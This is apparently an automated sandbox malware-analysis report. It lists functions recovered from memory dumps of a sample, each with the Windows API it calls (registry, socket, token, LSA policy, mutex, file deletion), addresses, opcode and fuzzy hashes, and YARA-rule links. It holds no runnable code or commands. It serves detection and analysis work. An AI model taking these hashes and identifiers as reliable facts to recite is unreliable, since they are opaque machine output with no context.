Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: ea34153bb6d48622c15085cb611d0b937ee9c405f0e16e57c420fbb97a4da308
Instruction ID: 805ef2ccdef68fb9887c18bb3021594af00aad9de342cc67db077b5b867c2c9c
Opcode Fuzzy Hash: ea34153bb6d48622c15085cb611d0b937ee9c405f0e16e57c420fbb97a4da308
Instruction Fuzzy Hash: 52318F71109784AFE722CB25CC45FA2BFF8EF06314F18849AE9859B253D264E549CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02CC38BE, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNELBASE(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC3968

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: 04d7c975cf527ce919286b66da452f78efecd51ab141510a0ecc84b95904d00e
Instruction ID: 825163ce89fa568362afdb752fc98c0e89c494a8f3cce9a4a302279bfbfdde49
Opcode Fuzzy Hash: 04d7c975cf527ce919286b66da452f78efecd51ab141510a0ecc84b95904d00e
Instruction Fuzzy Hash: E231C472405384AFEB22CF60DC44FA6FFA8EF46314F1884DBE9859F152D264A549CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC132C, Relevance: 1.6, APIs: 1, Instructions: 88networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC13D2

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 5e871d075db92c7c6e1439224f2849dd8b6390f820c1601d3273a7c2fcb06161
Instruction ID: c17ab5d6befdd261f45b1f19fde29475c29e62b72d57fbda8fbd448857c7989b
Opcode Fuzzy Hash: 5e871d075db92c7c6e1439224f2849dd8b6390f820c1601d3273a7c2fcb06161
Instruction Fuzzy Hash: E031B172409380AFD712CB65CC44F96BFB8EF47324F1884EBEA849B153D264A549C771

Uniqueness

Uniqueness Score: -1.00%

Function 02CC5336, Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 02CC53C2

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 5e3158d7ec80fb4d3fb3403ccdb0958f8e95129bde9b1b9243a6ccb48281a849
Instruction ID: c632f333b033d9a43eedaa620010e018526e559c18770b14752a42bc4cb52eb3
Opcode Fuzzy Hash: 5e3158d7ec80fb4d3fb3403ccdb0958f8e95129bde9b1b9243a6ccb48281a849
Instruction Fuzzy Hash: 25318C7150A3C05FD712CB358C54AA2BFE4AF07214F1C84EEE988DF263E265A549CB22

Uniqueness

Uniqueness Score: -1.00%

Function 02CC05CC, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 02CC067E

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 3b2b1e38776df6104657a1140dd327f49a1b332c4893526ecb3fcf466b3d08e8
Instruction ID: d222aabf5d4629d602b5f636d4e7a067c0b78c076cc3a3f5ddf2ad0efec5c436
Opcode Fuzzy Hash: 3b2b1e38776df6104657a1140dd327f49a1b332c4893526ecb3fcf466b3d08e8
Instruction Fuzzy Hash: 6B31E2B2404380AFE722CF54DC44F96FFF8EF46320F04859EE9848B262D364A509CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0101AFCF, Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 0101B06C

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 873db7a370fd25bedd4f45fd2d77fe9ef2eac5523e71a0bc3c7208ecfcfd556c
Instruction ID: 779dfe43492d72f0cc8e8215865f15b20bf9289eff9df4967e981a93f513d290
Opcode Fuzzy Hash: 873db7a370fd25bedd4f45fd2d77fe9ef2eac5523e71a0bc3c7208ecfcfd556c
Instruction Fuzzy Hash: FF318171109384AFD7228B25DC55F97BFB8EF06314F0884ABE985DB153D264A508C772

Uniqueness

Uniqueness Score: -1.00%

Function 0101B2F3, Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 0101B38F

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: OpenPolicy
String ID:
API String ID: 2030686058-0
Opcode ID: 34677cf2101806b722a4d1f7dcd2273f488af7079e210e01c0187aa4ea492916
Instruction ID: e4f2bfb30c557c65803f92c65aab8f10555f0a15090b641351907e23853615a4
Opcode Fuzzy Hash: 34677cf2101806b722a4d1f7dcd2273f488af7079e210e01c0187aa4ea492916
Instruction Fuzzy Hash: AB219E72504344AFE721CF65DC85FAABFF8EF46310F08849AED849B252D364A418CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02CC0959, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 02CC09F9

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 3e9f5a8aa7ed48f281cb933947a30c0ac0fc897f7999df36bfe475577be0e3d7
Instruction ID: 046eb92f4c55756211e737b0e5c0b72005be8a5ef4ad135de5fe0f7ab3ddc35a
Opcode Fuzzy Hash: 3e9f5a8aa7ed48f281cb933947a30c0ac0fc897f7999df36bfe475577be0e3d7
Instruction Fuzzy Hash: 023181B1509380AFE712CF65CC45F56FFE8EF45210F18849EE9889B292D375E904CB65

Uniqueness

Uniqueness Score: -1.00%

Function 02CC14E9, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 02CC1596

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: c068aadeab2126576a0b99fba83dd51e1faeea3348100ddde2504265b9b3f2fd
Instruction ID: 6a3db4e17693364ff10a84a3b98f56651a484a8a908208409d59efbf8f0179ad
Opcode Fuzzy Hash: c068aadeab2126576a0b99fba83dd51e1faeea3348100ddde2504265b9b3f2fd
Instruction Fuzzy Hash: C7317F715093C06FD3128B259C55B62BFB8EF87610F1A81DBE9848B5A3D2646909C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC3D4A, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E2C), ref: 02CC3DEF

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 0f86fff231b74e56b9e141059dd33da10e4a1c1ada44fa986bf2d3834dfe546e
Instruction ID: 1b6de7607185c40b6f9e8fe342932f7aea3dc929f12a5a252ee736bc557e9881
Opcode Fuzzy Hash: 0f86fff231b74e56b9e141059dd33da10e4a1c1ada44fa986bf2d3834dfe546e
Instruction Fuzzy Hash: 3E21E1B1000240AFF7219B61DC85FA6FBACEB44710F10885AFE449B281D7B4A5058BB1

Uniqueness

Uniqueness Score: -1.00%

Function 0101A120, Relevance: 1.6, APIs: 1, Instructions: 83networkCOMMON

Download Yara Rule

APIs

gethostname.WS2_32(?,00000E2C,?,?), ref: 0101A1C2

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: gethostname
String ID:
API String ID: 144339138-0
Opcode ID: 5bd730b015bbf8b297876a47dd1acbfa93f47ccbe334c97a99ab7c6c901b9593
Instruction ID: aa6ea2cc020359edb093e15728e93a453e950ed8c10d69eb8c7b36e4472bbf71
Opcode Fuzzy Hash: 5bd730b015bbf8b297876a47dd1acbfa93f47ccbe334c97a99ab7c6c901b9593
Instruction Fuzzy Hash: 0931D67140D3C06FD7038B758C55B62BFB4EF47620F1985DBD9848F1A3D225A909CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC36C4, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNELBASE(?,00000E2C), ref: 02CC375D

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: 85862a494f5859141895fb452292c670a5c73ccf88e5e997139544fdbd5ef2d5
Instruction ID: da93080f9b33ae76e9449a8c4f7d2f302146a1808df547d7098127743658ed08
Opcode Fuzzy Hash: 85862a494f5859141895fb452292c670a5c73ccf88e5e997139544fdbd5ef2d5
Instruction Fuzzy Hash: FF21E1B1408384AFE7128B25DC45F66BFB8EF46310F0884EBED849F153D264A509CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0101BD00, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 0101BD95

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 54eb20a9ee189600481063647056e98b430f0569ae2bc36a8363bb028e144c58
Instruction ID: bbc9631d684a21be2f9eb902d47456a6d87932bab4c7df99af8fa0abfdd9d94c
Opcode Fuzzy Hash: 54eb20a9ee189600481063647056e98b430f0569ae2bc36a8363bb028e144c58
Instruction Fuzzy Hash: 2221D6B54093806FE7138B25DC41BA2BFA8EF47720F1884DBEE849B293D2646909C771

Uniqueness

Uniqueness Score: -1.00%

Function 02CC0D42, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,00000E2C), ref: 02CC0DBF

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6d5ce2a9117767d2c2d1e4fa5d8043e39ee21af3cfef5d26c7b4a0e896828915
Instruction ID: 917d4a13c71c110deeb5e65e99b476c700f88ad6719035255eaa801475995b12
Opcode Fuzzy Hash: 6d5ce2a9117767d2c2d1e4fa5d8043e39ee21af3cfef5d26c7b4a0e896828915
Instruction Fuzzy Hash: 0021BD72500304EFEB219F65DC44FABFBACEF04320F14886EEE859B251D670A5188BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC3015, Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC30AD

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: c71cfc6d78c246cc6290c0be7c8b5bd69fedbfd8986329a8e0fc3643d47d2ea7
Instruction ID: 2c9ff87af363e0fa830e445ece65fefacdb34829278b4bb97f46e40fd4e7621e
Opcode Fuzzy Hash: c71cfc6d78c246cc6290c0be7c8b5bd69fedbfd8986329a8e0fc3643d47d2ea7
Instruction Fuzzy Hash: 3A218272409380AFD7228B25DC44F96FFB8EF46320F1885DBE9859F193C365A509CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC0007, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC0091

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 745c1b4602284a7949a59a995f4f8d38b580ada1eed3b96bb74f2127d14893ed
Instruction ID: 223d8dfc73333059faaf3978da4c5e0deb0daa511394766b576eafe8d64315ec
Opcode Fuzzy Hash: 745c1b4602284a7949a59a995f4f8d38b580ada1eed3b96bb74f2127d14893ed
Instruction Fuzzy Hash: 9621B671409380AFE7228F65DC44F67BFB8EF46314F18849BEE849F152D265A509C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC37EA, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 02CC3869

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 91bb02a08fa347e79900cadbf1e0bbccbe3c1e1468e29e71be58b8c0aa110768
Instruction ID: a27fe7b6d840236c2c42de6ae18bfd838e25b1eca0cf4fe97f947779d196ba88
Opcode Fuzzy Hash: 91bb02a08fa347e79900cadbf1e0bbccbe3c1e1468e29e71be58b8c0aa110768
Instruction Fuzzy Hash: C621AC72504204AEEB209F65DC84FABBBACEF44720F14896BEE45DB241D664E508CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0101B82E, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 0101B8BA

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: b16eb1712fad9bc336e36efe82886c67a44d1d0fb4081996701c6f5d22afa940
Instruction ID: 21c801b1f1da01d0bf5b68eddef392a34b4b1df92106ba20048d005dda07d49b
Opcode Fuzzy Hash: b16eb1712fad9bc336e36efe82886c67a44d1d0fb4081996701c6f5d22afa940
Instruction Fuzzy Hash: 56219F71409380AFE722DF65DC45F96FFF8EF49210F08859EEA859B252D375A408CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC35EB, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC3687

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: e216270d4ca69bf55281781af34a34813bffbb6960c84a1fc7231741546c5a0e
Instruction ID: 738e4daf017c09e203863d8c4ac169417d8c0f02011c1932771da1c57c4a7dc5
Opcode Fuzzy Hash: e216270d4ca69bf55281781af34a34813bffbb6960c84a1fc7231741546c5a0e
Instruction Fuzzy Hash: F521A0710093C46FE7128B25DC51FA6BFB8EF07314F1884DBE9849B253D224A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0101BC2A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0101BCA9

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 99cbf302ab2c516fc5e44dbc5a1e2bfa1447d684bd4a65a6a33593d7e51f8c1e
Instruction ID: ca2bd53d6ebe1ad5cf35876822252bc38f6fdc61ebde6a8f3823ec62c486890a
Opcode Fuzzy Hash: 99cbf302ab2c516fc5e44dbc5a1e2bfa1447d684bd4a65a6a33593d7e51f8c1e
Instruction Fuzzy Hash: B6219A71500604AFEB21DF69C884BA6FBE8EF08310F1484AEEE858B252E775E404CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02CC024E, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC02E0

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 5d8413234d66196e037a38560c3d56b5dc37bd6b64e046042ba05f1b79759100
Instruction ID: 2fc72251b524597f264ee907e4883db929e0530a641c113d07947d635bb780a5
Opcode Fuzzy Hash: 5d8413234d66196e037a38560c3d56b5dc37bd6b64e046042ba05f1b79759100
Instruction Fuzzy Hash: 2F218972509344AFE722CF65CC44F67BFA8EF4A710F18849AEA859B252D364E508CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0101AB56, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0101ABD5

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: be3139a0690c450b4cf6002a847868f9625f9dc30dea2d183b6c51730866b2be
Instruction ID: ce7300a7bc064e795c94f44fe83edb1b9a6a05265085a33d7d465c0fcac21656
Opcode Fuzzy Hash: be3139a0690c450b4cf6002a847868f9625f9dc30dea2d183b6c51730866b2be
Instruction Fuzzy Hash: 27219F72500644EFE7219B59CC84FABFBECEF04710F14885BEE859B242D664E4088BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC1085, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC110B

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: getsockname
String ID:
API String ID: 3358416759-0
Opcode ID: e29165087589b67fe0ce178472881aa4292c0178d1f12042f04acffb960de50f
Instruction ID: b16adc352617779f9986c97c75373d89c41cfbaa1714227d1a7155045b6bd6c2
Opcode Fuzzy Hash: e29165087589b67fe0ce178472881aa4292c0178d1f12042f04acffb960de50f
Instruction Fuzzy Hash: F921B371508384AFD711CF65DC44F97BFA8EF46310F1884ABEA499B252D364A504CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02CC4563, Relevance: 1.6, APIs: 1, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000E2C), ref: 02CC4603

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 62113f68721f23c9f47a4c24725d7839977b59e8abc7466f229c10785573e544
Instruction ID: f7a3e3e6ea550c1459fb03447bf8abdc0256f63f0261bed4db069479618cfaf2
Opcode Fuzzy Hash: 62113f68721f23c9f47a4c24725d7839977b59e8abc7466f229c10785573e544
Instruction Fuzzy Hash: 2321C5714493846FE722DB14DC45FA2FFA8DF46720F1880DAED849F192D268A949C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC39EA, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 02CC3A5E

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 3eaa671ea62767579a68de3e2217315f56fb8dca1fbec90a9ae62372ad37f098
Instruction ID: 0513eb46d9d62ed6d7830f6d16f942651db741b1bdb54df13173509bb027ef9a
Opcode Fuzzy Hash: 3eaa671ea62767579a68de3e2217315f56fb8dca1fbec90a9ae62372ad37f098
Instruction Fuzzy Hash: 6E21AE72500244AFEB209F65DC45F6BFBACEF44710F1488AAEE449B242D670A5188BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC3115, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetPerAdapterInfo.IPHLPAPI(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC319F

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: AdapterInfo
String ID:
API String ID: 3405139893-0
Opcode ID: 6949fa46781e649606e22abd090bdb67c3b90f697471a109d1a07dda5bdc34f3
Instruction ID: e9486cda6ab707e50e69431e73f860e5cf06fa1d7c5acedeb8c57caccf354fba
Opcode Fuzzy Hash: 6949fa46781e649606e22abd090bdb67c3b90f697471a109d1a07dda5bdc34f3
Instruction Fuzzy Hash: 9821F572409380AFD7228B25DC45F66FFB8EF46324F18C5DFE9449B2A2D224A508C771

Uniqueness

Uniqueness Score: -1.00%

Function 0101B31E, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 0101B38F

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: OpenPolicy
String ID:
API String ID: 2030686058-0
Opcode ID: 8bbc92f1680eb6155c2830f5bf3c3c98648b2fe0682d8626ebc5f10eedca75ab
Instruction ID: 562715d638faf974161ef797ebb9310a82c8df8fdbddf4b5edfbb66a06913dd3
Opcode Fuzzy Hash: 8bbc92f1680eb6155c2830f5bf3c3c98648b2fe0682d8626ebc5f10eedca75ab
Instruction Fuzzy Hash: CA21AE71500204AFE721DF69DC45F6AFBECEF44710F14886AEE85DB241D774A4188B75

Uniqueness

Uniqueness Score: -1.00%

Function 02CC0986, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 02CC09F9

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 7315148791a8240bc9db394fa55ed9b9c725993df9ad1d844469f2d760ac96ff
Instruction ID: 4d5491d35c54db03bfa954c6f3a493395c4fc2799066dcd25aa29bb882e1c0c0
Opcode Fuzzy Hash: 7315148791a8240bc9db394fa55ed9b9c725993df9ad1d844469f2d760ac96ff
Instruction Fuzzy Hash: F4217C71500200AFF720DF65C885B6AFBE8EF44614F1484AEEE499B242E775E505CB75

Uniqueness

Uniqueness Score: -1.00%

Function 02CC3526, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC35A1

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: e80e0e8d6620caea7fcb9083c4b612136f06783d554d3e84af432eff39af46b5
Instruction ID: a3e6302a6602ca46f8aa2be2dbb233e24672fceab03f97fc6256fbf4aa976484
Opcode Fuzzy Hash: e80e0e8d6620caea7fcb9083c4b612136f06783d554d3e84af432eff39af46b5
Instruction Fuzzy Hash: CD21A971500604AFEB21CF15DC84FA6FBE8EF48310F1484AAEE458B251D370E508CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC1169, Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC11E7

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 34dc8d99429fa9e1d9b805510e7b92be22ee4cfc16857c38f59a13c3bb396978
Instruction ID: d96881760f5605d1d8ff7b219c9b4f2d0b1a32b489545811d2dcc8a41fcbb9e4
Opcode Fuzzy Hash: 34dc8d99429fa9e1d9b805510e7b92be22ee4cfc16857c38f59a13c3bb396978
Instruction Fuzzy Hash: 56219271409384AFD712CF65DC44F56BFA8EF46310F18849BEA449B252D264A504CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0101B002, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 0101B06C

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 9795473ee8e0229a96014ce48b1573a3e5a90713344517d5197ddb7a0e63824d
Instruction ID: d3ada7e8a123d77593ae1b2addf24c0667cd98a1a50b823b45719c130368adf4
Opcode Fuzzy Hash: 9795473ee8e0229a96014ce48b1573a3e5a90713344517d5197ddb7a0e63824d
Instruction Fuzzy Hash: 91119D71500204AEEB228F69DD85FABBBACEF05320F14846BEE459B251D674A5088BB1

Uniqueness

Uniqueness Score: -1.00%

Function 0101AC5E, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 0101ACD8

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 3013eaacca258b0bd502a78d26474fe96746c43014b9fb63c4528e3c3449f5d0
Instruction ID: bba7cd031bbc481cb7cdd25202b58ce9b6e25e1d217b748490252ab8b52f91ef
Opcode Fuzzy Hash: 3013eaacca258b0bd502a78d26474fe96746c43014b9fb63c4528e3c3449f5d0
Instruction Fuzzy Hash: E1218E71600648EFE720DF19CC80FA7BBECEF04710F0484AAEA859B255D664E408CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02CC5798, Relevance: 1.6, APIs: 1, Instructions: 69fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 02CC580C

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 3f930711ef9047187840dc8483c0221f39904c5e984fe436fdcf8303a494a193
Instruction ID: 6a5900725f4cdfe1aadf1084e15ac98b486bb36bdc70b58dbe01d00c0fe48e37
Opcode Fuzzy Hash: 3f930711ef9047187840dc8483c0221f39904c5e984fe436fdcf8303a494a193
Instruction Fuzzy Hash: 7321CF725093C09FEB12CF25DC51792BFE8AF43220F0D84EAD984DF263D224A948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02CC126A, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON

Download Yara Rule

APIs

accept.WS2_32(?,?), ref: 02CC12D5

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: accept
String ID:
API String ID: 3005279540-0
Opcode ID: c76ff4d6eb63be729093b7014bc0713fb69d7d9d1fa937587f80648d31a6ac79
Instruction ID: 4accaafcb93a1e612b278aeab8bc7bbc34ab0c803b8ee085a861279e27c2f736
Opcode Fuzzy Hash: c76ff4d6eb63be729093b7014bc0713fb69d7d9d1fa937587f80648d31a6ac79
Instruction Fuzzy Hash: BA21A170500240AFE721DF26D845FA6FBE8EF44314F28846EEE489B242D7B1A504CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02CC4F51, Relevance: 1.6, APIs: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 02CC4FC8

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 3dd924aae42bdfda75d4c690b799f2823cb7e23838b7b99afc094728b7b77098
